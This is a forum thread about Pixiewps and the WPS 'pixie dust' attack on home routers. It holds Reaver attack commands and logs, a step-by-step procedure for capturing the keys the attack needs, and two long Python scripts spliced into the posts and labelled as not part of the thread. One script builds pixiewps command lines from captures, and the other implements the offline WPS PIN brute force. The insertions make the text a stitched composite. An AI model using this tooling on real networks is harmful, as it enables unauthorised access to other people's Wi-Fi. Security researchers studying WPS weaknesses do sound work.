
Thread: Pixiewps: wps pixie dust attack tool

  1. #1

    Pixiewps: wps pixie dust attack tool

    We started a new thread for collecting data: https://forums.kali.org/showthread.p...ll=1#post75368

    Pixiewps is a tool written in C used to brute-force the WPS PIN offline, exploiting the low or non-existent entropy of some access points, the so-called "pixie dust attack" discovered by Dominique Bongard in summer 2014. It is meant for educational purposes only.

    As opposed to the traditional online brute-force attack, implemented in tools like Reaver or Bully, which aim to recover the PIN in a few hours, this method can get the PIN in only a matter of milliseconds to minutes, depending on the target, if vulnerable.

    Recovering PIN:


    Recovering WPA-PSK (experimental):


    Brief description: Offline WPS bruteforce utility
    Repository: GitHub
    License: GNU GPLv3+
    Latest release: v1.3.x

    To work properly it requires a modified version of Reaver or Bully (neither version is maintained by me):
    Modded Reaver maintained by rofl0r and included in Kali: GitHub (active development)
    Modded Bully by aanarchyy: GitHub (stale)

    A non-exhaustive list of vulnerable devices (not maintained by me): here

    Thread where it all started: WPS Pixie Dust Attack (Offline WPS Attack)

    References:
    1. Video presentation
    2. Slide presentation
    Last edited by wiire; 2017-11-09 at 19:30. Reason: Added PSA

  2. Only one question: does this work with Broadcom chipsets too, or does it still only work with Ralink chipsets?

  3. #3
    Ralink and some Broadcom, not all.

  4. Problem: modified Reaver not showing the public key (PKE).

    Code:
    [+] Trying pin 00005678.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    > N1 Enrollee Nonce: f8:49:5a:df:00:b7:0b:9b:6c:cc:64:2d:11:c8:89:52
    [+] Received M1 message
    > AuthKey: ce:cc:a5:98:fb:a8:5c:c7:7b:5f:1a:a2:be:ca:1b:b5:40:27:72:a3:3e:d7:4b:db:dd:78:bf:3c:02:bc:51:aa
    [+] Sending M2 message
    > E-Hash1: 75:26:1a:d3:bd:73:ed:8e:3e:15:3b:aa:33:b0:dd:92:03:0b:93:7e:93:cb:c0:ec:34:64:9b:06:ea:61:71:8b
    > E-Hash2: 01:d6:8f:f1:9d:3d:da:52:3c:45:42:2f:5f:55:f2:3a:0c:00:3f:f2:ae:bf:9c:7b:12:6e:ee:56:89:2c:52:d3
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] p1_index set to 2
    [+] Pin count advanced: 2. Max pin attempts: 11000
    [+] Trying pin 01235678.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    > N1 Enrollee Nonce: 27:2b:38:0d:fc:3a:17:06:d4:7d:d3:09:4d:86:87:95
    [+] Received M1 message
    > AuthKey: 51:29:84:ca:f5:96:d2:b8:f3:90:9f:81:1f:3e:48:57:2e:5c:b1:81:13:83:84:66:86:82:d3:5b:1b:9b:75:ab
    [+] Sending M2 message
    > E-Hash1: 87:0f:45:30:2f:61:61:53:88:cb:b6:23:e9:ea:d5:22:9a:c4:c3:62:ff:2a:02:b7:99:a1:9d:99:d9:45:f7:82
    > E-Hash2: f9:51:2a:a4:3f:79:e7:67:28:f7:37:f4:31:a7:17:ca:75:e8:b8:3b:31:25:4a:13:60:c5:82:f5:ef:a7:cc:8f
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] p1_index set to 3

  5. #5
    @FurqanHanif
    You can get it out of the M1/M2 messages in Wireshark.
    There's also a tshark.sh script that can grab it for you. I forgot where I got it; I think it was part of the wpsoffline tool download.
    But make sure it's all part of one conversation (PIN attempt). I just make Reaver test one PIN at a time and capture.

  6. #6
    Did you install the new Reaver? Check out the YouTube video. You don't need Wireshark at all.

  7. #7
    Quote Originally Posted by soxrok2212 View Post
    Did you install the new Reaver? Check out the YouTube video. You don't need Wireshark at all.
    Please, if you can, reupload the download links... the YouTube link is deleted.

  8. #8
    Quote Originally Posted by soxrok2212 View Post
    Did you install the new Reaver? Check out the YouTube video. You don't need Wireshark at all.
    I was not able to find the YouTube video for the new Reaver. Could you please PM me the link? I would appreciate it.

  9. #9
    Quote Originally Posted by Necony286 View Post
    I was not able to find the YouTube video for the new Reaver. Could you please PM me the link? I would appreciate it.
    A) Can't post youtube links in this forum.
    B) Can't PM in this forum.

  10. @soxrok2212 I already mentioned that it's the modified Reaver, and I also downloaded it from the YouTube link. I tried this on five routers but it isn't giving me the same output for all (no PKE)...
    @wn722 Which one is the PKE exactly from this?
    Code:
    M1 wps.enrollee_nonce : e1123ae1a03001165f243ba7a2a19475
    M2 wps.enrollee_nonce : e1123ae1a03001165f243ba7a2a19475
    M2 wps.registrar_nonce : 5180afc40d4ca3e31d25affd14e78d1e
    M2 wps.authenticator : 72da6b2102198192
    M3 wps.registrar_nonce : 5180afc40d4ca3e31d25affd14e78d1e
    M3 wps.authenticator : 80c4d98ffd706201
    M3 wps.e_hash1 : 6e2cc52a5a22c84e19f701dc8153eb805fc0b247e06178ec3b01b7b8202ab69a
    M3 wps.e_hash2 : 51f0f1b6c9b828345094b535a3c1e120bad0c94f03bc5790b9de5ae40037224d
    M4 wps.enrollee_nonce : e1123ae1a03001165f243ba7a2a19475
    M4 wps.authenticator : 8824706540ab0f4d
    M4 wps.encrypted_settings : 20bfe3939b2872273204fc93dd52d4ec25b68a23e596630712b3404cdb1eb125fb3f4e96a8db05a754d5eeb98940728ea243e8925b0d968fac70fc5bf71b8a36
    M4 wps.r_hash1 : b1eea2314f81f2e3d40afbe5af5c19b61bcb7f955d57f616306a696da347f0e5
    M4 wps.r_hash2 : eaf1b41b28edb43b6feeafdad792500a34482ec1b2b6ad8e974288230648e38c
    Last edited by FurqanHanif; 2015-04-03 at 13:42.

  11. #11
    Did you move reaver to bin after you compiled?

  12. #12
    Before trying the tool I really want to say to you "thank you so much wiire!"
    For all your great work and above all your explanations all the way along (and for releasing GPL v3 code)

    - to work on a modified version of Reaver/Bully
    We can see that it comes from the heart and that it must have been a "pain in th-censored-ss" at some points.

    Thank you so much wiire!

  13. Quote Originally Posted by soxrok2212 View Post
    Did you move reaver to bin after you compiled?
    Code:
    ./configure
    make
    make install

    I think it overwrites the existing Reaver (because the existing Reaver doesn't show the enrollee/E-Hash stuff, but installing the modified Reaver shows the enrollee/E-Hash stuff, though not the PKE).. :/ So I think there is no need to copy reaver to bin.

  14. #14
    Quote Originally Posted by FurqanHanif View Post
    Code:
    ./configure
    make
    make install

    I think it overwrites the existing Reaver (because the existing Reaver doesn't show the enrollee/E-Hash stuff, but installing the modified Reaver shows the enrollee/E-Hash stuff, though not the PKE).. :/ So I think there is no need to copy reaver to bin.
    See if it compiles and creates the executable. Then try to run it from that folder (no make install).

    Code:
    chmod +x configure
    ./configure
    make distclean && ./configure
    make
    ./reaver -i mon0 etc.

  15. #15
    Hi,

    I cannot install pixiewps, I get the following message:

    Code:
    gcc -std=c99 -o pixiewps pixiewps.c random_r.c -lssl -lcrypto
    In file included from pixiewps.c:51:0:
    pixiewps.h:66:25: fatal error: openssl/sha.h: No such file or directory
    compilation terminated.
    make: *** [all] Error 1

    I tried this command: gcc -o pixiewps pixiewps.c -lssl -lcrypto and also the recommendation given by mmusket33, but I still have the same problem. I would really appreciate it if anybody could help me... Thanks in advance.

  16. #16
    @KIMW

    pixiewps is now in the official Kali repo; you can install it with "apt-get install pixiewps".

  17. #17
    I run
    Code:
    sudo reaver -i mon0 -vvv -K 1 -b 02:26:4D:AA:XX:XX
    but I never get the M3 message (E-Hash1 and E-Hash2). I tried with several routers and the output from Reaver never contains E-Hash1 or E-Hash2.
    Any ideas what is wrong?
    I configured the router for WPS. It is based on the Ralink RT2860. Signal is good (1 m distance).

    I use a laptop with an Intel Centrino Wifi N card and reaver 1.5.2 from GitHub, mod by t6_x.

  18. #18
    Quote Originally Posted by bora View Post
    I run
    Code:
    sudo reaver -i mon0 -vvv -K 1 -b 02:26:4D:AA:XX:XX
    but I never get the M3 message (E-Hash1 and E-Hash2). I tried with several routers and the output from Reaver never contains E-Hash1 or E-Hash2.
    Any ideas what is wrong?
    I configured the router for WPS. It is based on the Ralink RT2860. Signal is good (1 m distance).

    I use a laptop with an Intel Centrino Wifi N card and reaver 1.5.2 from GitHub, mod by t6_x.
    The wireless card probably does not support injection.

  19. #19
    Quote Originally Posted by bora View Post
    I run
    Code:
    sudo reaver -i mon0 -vvv -K 1 -b 02:26:4D:AA:XX:XX
    but I never get the M3 message (E-Hash1 and E-Hash2). I tried with several routers and the output from Reaver never contains E-Hash1 or E-Hash2.
    Any ideas what is wrong?
    I configured the router for WPS. It is based on the Ralink RT2860. Signal is good (1 m distance).

    I use a laptop with an Intel Centrino Wifi N card and reaver 1.5.2 from GitHub, mod by t6_x.
    I have the same problem. Using a 2011 MBP with Broadcom drivers.
    Any help would be appreciated.

    Thanks!

  20. #20
    Minor issue: it doesn't compile under Ubuntu's gcc 4.8.2 unless I edit the makefile as follows:
    Code:
    $(CC) pixiewps.c $(CCFLAGS) -o $(TARGET)

  21. Getting the same output...

  22. #22
    Can you go into some detail, as there is a lot of censored information in the OP? Does this run similarly to Reaver? Does this automate the extraction of the required information from Wireshark? Maybe a usage example would be helpful, as I did not see one.

    i.e.: pixiewps -b <bssid> or similar...

    Amazing work, nonetheless!

  23. #23
    It's really not that hard to install. We told you exactly what to do. If you can't copy the reaver executable to bin, you shouldn't be using Linux.

  24. I copied that Reaver file to bin, getting the same output; started reaver from the compiled directory, still getting the same output; tried tshark, it also isn't showing the public key. Now what?

  25. #25
    It works perfectly.
    Just that I hadn't updated my Kali for a while and I tried to install it without updating first and I got a failure.
    After updating I could compile and install pixiewps.c.
    Before updating I installed
    Code:
    libsqlite3-dev
    I don't know if it was useful.
    cheers & thanks

  26. #26
    Hey, just wanted to say thanks again for releasing this; it seems to work pretty well for me. One thing I noticed is that on some routers the model # shows up as 123456; kinda curious as to why that is. Also I just noticed the vid soxrok2212 put up last night has been taken down; was that y'all or YouTube?

  27. #27
    Quick question: do you have to specify small DH in Reaver to use the -S flag in pixiewps?

  28. #28
    Quick answer:
    I don't know if it is necessary, but I did it like this and it worked.
    That's actually a question that I had in mind too.

  29. #29
    Quote Originally Posted by kcdtv View Post
    Quick answer:
    I don't know if it is necessary, but I did it like this and it worked.
    That's actually a question that I had in mind too.
    Hah! That was quick! I'll see if I can test this later on. Awesome work wiire; so far this seems to work great.

  30. #30
    Yes. Then you don't need to dig for the PKR in Wireshark.

  31. #31
    Since the help vid is down, MTeams provides the following:

    This assumes you have a working Reaver modded for pixie dust.
    This assumes you can run reaver and wash.
    This will only show you how to quickly find the five (5) variables required.

    The modified Reaver obtains three (3) of the five (5) variables. The only other problem is finding the corresponding or paired --pke and --pkr in Wireshark.

    After you have put your wifi device in monitor mode:

    1. Start Wireshark.
    2. Select Capture.
    3. Select Interface and choose your capture interface(s).
    4. Start the capture.
    5. Click capture filters.
    6. Type or select wps.public_key [Enter].

    When you hit Enter the Wireshark screen may go blank as it filters the output.

    7. Start reaver.
    8. As reaver obtains M1 and M2 data, only these lines will appear in Wireshark.
    9. When you have collected enough data, stop reaver and Wireshark.
    10. Copy your reaver output from the terminal window and save it to a text file. You will need it later.

    The N1 Enrollee Nonce links the output in reaver to the correct M1 and M2 packets in Wireshark.

    11. Go to Wireshark, click on the top screen showing No. Time Source...... Info WPS M1.

    The --pke is located in the WPS M1 packets.

    12. Select Ctrl-F. A drop-down menu will appear: Wireshark Find Packet.

    Select String.

    Select Packet Details.

    In the Filter block type "public key", then select Find.

    13. Your cursor should now be over Public Key in the middle Wireshark window and you should be in a WPS M1 packet (top screen info).

    14. Scroll up in the middle Wireshark block and find the Enrollee Nonce. Go to the reaver text file you saved and find the same N1 Enrollee Nonce. If it is followed by:

    1. AuthKey
    2. E-Hash1
    3. E-Hash2

    you can use this packet in Wireshark.

    15. Scroll down in the same middle block in Wireshark and find Public Key: hex string.

    16. Click on the Public Key, then right-click, select Copy, follow the > to the right, select Value. The --pke value is now on the clipboard. Copy it to a text file.

    17. Go to Wireshark, click on the top screen showing No. Time Source...... Info WPS M2.

    18. Again make sure the Enrollee Nonce is the same and copy the Public Key from the M2 packet. Do not confuse the Registrar Nonce with the Enrollee Nonce in the M2 packet. You now have the paired --pkr hex string.

    As long as the enrollee nonce is the same in both the reaver output and the Wireshark M1 and M2 packets, you have picked the right packets in Wireshark.

    Put the five (5) variables in your pixie dust program and try your luck.

    Currently we type in leafpad the following at the bottom of the reaver output file we made in item 10 above and then just paste in the hex strings. When completed we paste the entire text string into a terminal window and type [Enter]:

    Code:
    pixiewps --e-nonce --pke --pkr --authkey --e-hash1 --e-hash2

    After a few runs you can do this in less than three (3) minutes.
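
The nonce-matching in steps 14 and 18 above, done programmatically, as an added example that is not part of this thread and not code from pixiewps or the modded Reaver. It assumes two constructed inputs: a Reaver log in the format shown earlier in this thread, and a tshark-style field dump in the "M1 wps.enrollee_nonce : hex" format also shown in this thread, where each blank-line-separated group is one packet (that grouping is this script's convention, not tshark's). The nonces are the ones visible in the thread; the keys and hashes are filler of the right length. It emits the pixiewps command line with the long options listed in the post above, substituting --dh-small when the captured PKR is the 00...02 value that Reaver's --dh-small sends (as wiire notes later in the thread).

```python
"""Pair Reaver's per-attempt output with captured M1/M2 public keys by enrollee nonce
and emit the pixiewps command line."""
import re


def colon(byte_hex: str, n: int = 32) -> str:
    return ":".join([byte_hex] * n)


# Constructed sample data (not a real capture). Nonces are the ones shown in this thread;
# keys and hashes are filler of the right length (192-byte DH keys, 32-byte hashes).
PKE = "ab" * 192
PKR_SMALL = "00" * 191 + "02"   # what Reaver --dh-small puts on the wire as PKR
REAVER_LOG = f"""\
[+] Trying pin 00005678.
[+] Sending EAPOL START request
> N1 Enrollee Nonce: f8:49:5a:df:00:b7:0b:9b:6c:cc:64:2d:11:c8:89:52
[+] Received M1 message
> AuthKey: {colon('11')}
[+] Sending M2 message
> E-Hash1: {colon('22')}
> E-Hash2: {colon('33')}
[+] Received M3 message
[+] Trying pin 01235678.
> N1 Enrollee Nonce: 27:2b:38:0d:fc:3a:17:06:d4:7d:d3:09:4d:86:87:95
[+] Received M1 message
> AuthKey: {colon('44')}
[+] Sending M2 message
"""
# tshark-style field dump in the format used in this thread; one packet per blank-line
# separated group (the grouping is this script's convention). The stray space in the
# first nonce mimics forum/terminal wrapping.
WPS_FIELDS = f"""\
M1 wps.enrollee_nonce : 27 2b380dfc3a1706d47dd3094d868795
M1 wps.public_key : {'cd' * 192}

M1 wps.enrollee_nonce : f8495adf00b70b9b6ccc642d11c88952
M1 wps.public_key : {PKE}

M2 wps.enrollee_nonce : f8495adf00b70b9b6ccc642d11c88952
M2 wps.registrar_nonce : 5180afc40d4ca3e31d25affd14e78d1e
M2 wps.public_key : {PKR_SMALL}
"""

REAVER_LINE = re.compile(r"\s*>\s*(N1 Enrollee Nonce|AuthKey|E-Hash1|E-Hash2)\s*:\s*(.+)")
FIELD_LINE = re.compile(r"\s*(M\d)\s+(wps\.\w+)\s*:\s*(.+)")


def norm_hex(s: str) -> str:
    """Drop colons and the spaces that wrapping inserts; lower-case the hex."""
    return re.sub(r"[^0-9a-fA-F]", "", s).lower()


def parse_reaver(log: str) -> list:
    """One dict per 'Trying pin' attempt with whatever '>' fields Reaver printed for it."""
    attempts, cur = [], None
    for line in log.splitlines():
        if "Trying pin" in line:
            cur = {}
            attempts.append(cur)
            continue
        m = REAVER_LINE.match(line)
        if m and cur is not None:
            cur[m.group(1)] = norm_hex(m.group(2))
    return attempts


def parse_packets(dump: str) -> list:
    """One dict per packet: {'msg': 'M1', 'wps.enrollee_nonce': ..., 'wps.public_key': ...}."""
    packets, cur = [], None
    for line in dump.splitlines():
        if not line.strip():
            cur = None
            continue
        m = FIELD_LINE.match(line)
        if not m:
            continue
        if cur is None:
            cur = {"msg": m.group(1)}
            packets.append(cur)
        cur[m.group(2)] = norm_hex(m.group(3))
    return packets


def pair_by_nonce(attempts: list, packets: list) -> list:
    """Keep only attempts where Reaver saw M3 and both an M1 and an M2 carrying the same
    enrollee nonce were captured; a PKE/PKR from another attempt would never verify."""
    keys = {(p["msg"], p["wps.enrollee_nonce"]): p["wps.public_key"]
            for p in packets if "wps.public_key" in p and "wps.enrollee_nonce" in p}
    out = []
    for a in attempts:
        nonce = a.get("N1 Enrollee Nonce")
        if not nonce or not all(k in a for k in ("AuthKey", "E-Hash1", "E-Hash2")):
            continue   # no M3 for this attempt: nothing to attack
        pke, pkr = keys.get(("M1", nonce)), keys.get(("M2", nonce))
        if pke is None or pkr is None:
            continue   # unpaired capture
        out.append({"e_nonce": nonce, "pke": pke, "pkr": pkr, "authkey": a["AuthKey"],
                    "e_hash1": a["E-Hash1"], "e_hash2": a["E-Hash2"]})
    return out


def pixiewps_command(v: dict) -> str:
    """Long options as listed in this thread; --dh-small replaces the 00..02 PKR."""
    args = ["pixiewps", "--pke", v["pke"]]
    args += ["--dh-small"] if v["pkr"] == PKR_SMALL else ["--pkr", v["pkr"]]
    args += ["--e-hash1", v["e_hash1"], "--e-hash2", v["e_hash2"],
             "--authkey", v["authkey"], "--e-nonce", v["e_nonce"]]
    return " ".join(args)


def build_commands(log: str = REAVER_LOG, dump: str = WPS_FIELDS) -> list:
    return [pixiewps_command(v) for v in pair_by_nonce(parse_reaver(log), parse_packets(dump))]


if __name__ == "__main__":
    for cmd in build_commands():
        print(cmd)
```

The second attempt in the sample log never reached M3, so it produces no command: Reaver's E-Hash1/E-Hash2 are only printed once M3 arrives, and without them there is nothing for pixiewps to check against.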

  32. #32
    Video is back up in full HD; just search "WPS Pixie Dust" on YouTube and you'll find it.

  33. #33
    Quote Originally Posted by soxrok2212 View Post
    Video is back up in full HD; just search "WPS Pixie Dust" on YouTube and you'll find it.
    Awesome work soxrok2212! I have been playing with this for some time now; unfortunately I only have BCM*-based chipsets available for testing, and have had 0% success. Models range from the D-Link DSL2 series, Netgear WDNR series, and Linksys E series. Very awesome work just the same though, and a whole new era for WPS auditing. Let me know if you would like any of the results I have captured for analysis.

    My command for all tests was:
    Code:
    #~: pixiewps -e <pke> -s <ehash-1> -z <ehash-2> -a <auth-key> -S -n <e-nonce>

  34. #34
    @mmusket33, FurqanHanif
    I don't know which version of the modded Reaver you are using. The description of the youtube video contains the latest (download). It prints all the info needed (see the '[P]' tag) apart PKR which can be gathered in the M2 message (under Public Key), or can be avoided if the -S option is specified in both Reaver and Pixiewps. This option is used only to "ease the burden of a 10 seconds copy and paste work".

    While I was still working on the program I made a tutorial on another forum to print some information not all (Authkey, E-Hash1, E-Hash2) with the ' > ' tag at the beginning of every print. So maybe you guys are using the 'old version'?


    Changing topic, Bongard tweeted my tool.

  35. #35
    Quote Originally Posted by wiire View Post
    Changing topic: Bongard tweeted my tool.
    Very nice!

    if the -S option is specified in both Reaver and Pixiewps
    That answers aanarchyy's previous question, which I was not so sure about.

  36. In Wireshark the public key in both M2 messages is
    000000000000000............
    So is this normal? Should I continue with this? Router chipset is Broadcom.

  37. #37
    Quote Originally Posted by FurqanHanif View Post
    In Wireshark the public key in both M2 messages is . So is this normal? Should I continue with this? Router chipset is Broadcom.
    You get PKR = 00:00 ... 00:02 when using the '-S' ('--dh-small') option on Reaver. You can use the same option on Pixiewps so you don't need to specify the PKR.

    @kcdtv
    Fixed the dependency issue. Should compile fine now on Ubuntu and derivatives.

  38. #38
    Thank you for making this tool; it's not working on Technicolor APs, I hope it will, because in my country (Morocco) 75% of the APs are Technicolor LoL!

  39. #39
    Nice work wiire and all involved!

    Will be sure to test this and gather some information on UK ISP-based routers. I have a few lying around I can test.

  40. #40
    @kcdtv
    Fixed the dependency issue. Should compile fine now on Ubuntu and derivatives.
    Sweet! I can confirm that a friend had the same issue yesterday with Ubuntu and that the modification solved the issue. In the name of Canonical addicts (no one is perfect), thanks!
    As I was using reaver_mod and pixiewps.c I was wondering about these two options in the Reaver mod and how to "play" with them "smartly" with pixiewps.
    Code:
    	-1, --p1-index                  Set initial array index for the first half of the pin [False]
    	-2, --p2-index                  Set initial array index for the second half of the pin [False]
    So if I understand well, we could use them to try with pixiewps different seed values than the ones predefined for Ralink and Broadcom.
    Could you tell us a bit more about this?
    Other thing I was curious about: if I get the same nonce repeated in two different sessions, wouldn't it mean that the entropy is very low also on this particular AP?
    cheers

  41. #41
    Quote Originally Posted by kcdtv View Post
    As I was using reaver_mod and pixiewps.c I was wondering about these two options in the Reaver mod and how to "play" with them "smartly" with pixiewps.
    Code:
    	-1, --p1-index                  Set initial array index for the first half of the pin [False]
    	-2, --p2-index                  Set initial array index for the second half of the pin [False]
    So if I understand well, we could use them to try with pixiewps different seed values than the ones predefined for Ralink and Broadcom.
    I don't understand what you're trying to say here. Ralink doesn't have a seed. It doesn't use a pseudo-random number for ES-1 and ES-2. It uses a constant (ES-1 = ES-2 = 0).

    Broadcom has a pseudo-random number generator. Its seed (for ES-1 and ES-2) can be brute-forced using the nonce as a reference: when, using a certain number (initial seed), we get the same sequence as the nonce we know, then we can find the ES-1 and ES-2 sequences because they're calculated right after the nonce.

    The PIN is provided by the Registrar (the attacker) in M4 and it's not relevant (for the pixie dust attack's purposes). Quoting Bongard: the right PIN is provided by the Enrollee (AP) with M3 in two "safes". The first one contains the first half of the PIN and its lock combination is ES-1. The second one contains the second half of the PIN and its lock combination is ES-2. The attack consists in brute-forcing the seed of Broadcom's PRNG to get the two combinations (ES-1 and ES-2).

    Quote Originally Posted by kcdtv View Post
    Other thing I was curious about: if I get the same nonce repeated in two different sessions, wouldn't it mean that the entropy is very low also on this particular AP?
    If you look at page 55 of Bongard's slides:
    - "do not generate new random enrollee nonce in case of we have prebuild enrollee nonce"
    - "It should not generate new key pair if we have prebuild enrollee nonce"

    So on some implementations the nonce and the keys don't change in different sessions. This is not about entropy, it's about vendor/manufacturer's implementations.
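
The two "safes" wiire describes above, and the offline brute force that opens them, as an added example that is not part of this thread and not code from pixiewps. It assumes the WSC derivation (PSK1/PSK2 are the first 128 bits of HMAC-SHA256(AuthKey, half of the PIN as ASCII); E-Hash1/E-Hash2 are HMAC-SHA256(AuthKey, ES || PSK || PKE || PKR)) and uses constructed inputs: a random AuthKey and PKE, the 00...02 PKR that Reaver's --dh-small produces, and, for the seeded case, a toy LCG that stands in for a vendor PRNG and is not Broadcom's actual generator. The Ralink case (ES-1 = ES-2 = 0) needs no seed search; the toy case shows the principle from the post above, brute-forcing the seed until the enrollee nonce is reproduced and reading ES-1/ES-2 from the bytes drawn right after it.

```python
"""Pixie dust offline PIN recovery: the two M3 "safes" and the ES-1/ES-2 combinations."""
import hashlib
import hmac
import os

DH_KEY_LEN = 192  # bytes: WPS uses the 1536-bit MODP Diffie-Hellman group (RFC 3526 group 5)
# PKR that Reaver sends with --dh-small (registrar private key 1, so g^1 = 2): 00..00 02
PKR_DH_SMALL = (2).to_bytes(DH_KEY_LEN, "big")


def wps_checksum_digit(pin7: int) -> int:
    """Checksum digit that turns 7 chosen digits into an 8-digit WPS PIN (WSC spec)."""
    accum = 0
    while pin7:
        accum += 3 * (pin7 % 10)
        pin7 //= 10
        accum += pin7 % 10
        pin7 //= 10
    return (10 - accum % 10) % 10


def derive_psk(authkey: bytes, pin_half: str) -> bytes:
    """PSK1 / PSK2: first 128 bits of HMAC-SHA256(AuthKey, half of the PIN as ASCII)."""
    return hmac.new(authkey, pin_half.encode("ascii"), hashlib.sha256).digest()[:16]


def e_hash(authkey: bytes, es: bytes, psk: bytes, pke: bytes, pkr: bytes) -> bytes:
    """E-Hash1 / E-Hash2 = HMAC-SHA256(AuthKey, E-S || PSK || PKE || PKR)."""
    return hmac.new(authkey, es + psk + pke + pkr, hashlib.sha256).digest()


def enrollee_m3(authkey, pke, pkr, pin: str, es1: bytes, es2: bytes):
    """What the AP (enrollee) commits to in M3: two safes, locked with ES-1 and ES-2."""
    return (e_hash(authkey, es1, derive_psk(authkey, pin[:4]), pke, pkr),
            e_hash(authkey, es2, derive_psk(authkey, pin[4:]), pke, pkr))


def recover_pin(authkey, pke, pkr, ehash1, ehash2, es1, es2):
    """With ES-1/ES-2 known, open both safes offline. First half: at most 10^4 HMACs.
    Second half: 10^3 with the checksum digit derived, then 10^4 for APs that ignore it."""
    first = None
    for i in range(10_000):
        half = f"{i:04d}"
        if e_hash(authkey, es1, derive_psk(authkey, half), pke, pkr) == ehash1:
            first = half
            break
    if first is None:
        return None
    candidates = [f"{j:03d}{wps_checksum_digit(int(first) * 1000 + j)}" for j in range(1_000)]
    candidates += [f"{j:04d}" for j in range(10_000)]
    for second in candidates:
        if e_hash(authkey, es2, derive_psk(authkey, second), pke, pkr) == ehash2:
            return first + second
    return None


def toy_prng(seed: int, nbytes: int) -> bytes:
    """Toy LCG standing in for a vendor PRNG for illustration; NOT Broadcom's generator."""
    state = seed & 0xFFFFFFFF
    out = bytearray()
    for _ in range(nbytes):
        state = (state * 1103515245 + 12345) & 0xFFFFFFFF
        out.append((state >> 16) & 0xFF)
    return bytes(out)


def recover_es_from_nonce(e_nonce: bytes, seed_bits: int = 16):
    """Brute-force the seed until the generator reproduces the enrollee nonce, then read
    ES-1 and ES-2 as the 32 bytes the enrollee drew right after the nonce."""
    for seed in range(1 << seed_bits):
        if toy_prng(seed, 16) == e_nonce:
            stream = toy_prng(seed, 48)
            return stream[16:32], stream[32:48]
    return None


def demo(pin: str = "12345670"):
    """Both cases from the thread: Ralink (ES-1 = ES-2 = 0) and a seeded PRNG (toy stand-in)."""
    authkey = os.urandom(32)       # in practice printed by the modded Reaver
    pke = os.urandom(DH_KEY_LEN)   # constructed stand-in for the enrollee's DH public key
    pkr = PKR_DH_SMALL             # Reaver --dh-small / pixiewps -S

    zero = bytes(16)
    h1, h2 = enrollee_m3(authkey, pke, pkr, pin, zero, zero)
    ralink_pin = recover_pin(authkey, pke, pkr, h1, h2, zero, zero)

    stream = toy_prng(0xBEEF, 48)  # nonce, ES-1, ES-2 drawn back to back from one seed
    e_nonce, es1, es2 = stream[:16], stream[16:32], stream[32:48]
    h1, h2 = enrollee_m3(authkey, pke, pkr, pin, es1, es2)
    es = recover_es_from_nonce(e_nonce)
    prng_pin = recover_pin(authkey, pke, pkr, h1, h2, *es) if es else None
    return ralink_pin, prng_pin


if __name__ == "__main__":
    print(demo())
```

The work is bounded by 10^4 HMACs for the first half and 10^3 (or 10^4 when the AP does not honour the checksum digit) for the second, which is why the PIN falls in seconds once ES-1/ES-2 are known; the seed search is where a real vendor PRNG's seed width and output mapping decide whether the attack is practical.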

  42. #42
    This attack worked on Arris models TG1672 and DG1670.
    Modified Reaver spits out the info needed for pixiewps. WPS PIN in seconds.

  43. #43
    What is this, no stars for this topic yet? Geeeeeeeeez

  44. #44
    Tested with the UK Sky router Sagemcom SR101 - WPS PIN not found!

    I have a feeling this is a Broadcom chip; however, I can't find any more information on this. If anyone does, the information would be appreciated.

    Off to find some more to test!

  45. #45
    @Calamita
    Use the pcap file and run it through the tshark.sh script; that'll extract the HW info.
    Or go to the FCC ID tool and use the FCC ID number; it's usually on the sticker.
    http://fccid.net/
    Last edited by wn722; 2015-04-06 at 02:49.

  46. #46
    Where can I find a link to tshark.sh?

  47. #47
    This worked so well for me... WOW. So WPS has been broken completely.

    I did a couple of captures, and noticed in Wireshark that when you have a successful attempt, the relevant part of the M2 packet will be marked in light blue. I think that's what it was, anyway... I was thinking it signified a successful capture of what it needed, as it listed ",,,R,F,C" on the good one, and only ",,,F,C" on the fails.

    It took 0 seconds to crack, by the way. You're brilliant.

  48. #48
    Hi all!
    Can you help me, please?
    Where is the problem? Thanks!

    screenshot
    http://www36.zippyshare.com/v/WF6nh9cU/file.html

  49. #49
    Hello! I want to know whether this attack is limited to the known vulnerable chipsets, or if it can be used on more routers if more research is done?

  50. #50
    Quote Originally Posted by Desuu View Post
    Hello! I want to know whether this attack is limited to the known vulnerable chipsets, or if it can be used on more routers if more research is done?
    This attack could potentially be extended to more routers if more research is done. There are some other manufacturers that have not been checked yet (like Marvell, Intel, Qualcomm, Realtek...). Also, good entropy on embedded systems (with limited resources) is always a problem, especially at boot.

    The devices that are not affected are probably the ones which use hardware random number generators. Also systems running Linux/hostapd seem secure.

    I have nearly zero experience with this kind of stuff, so if you wanna jump in, do it. Anyone can contribute.
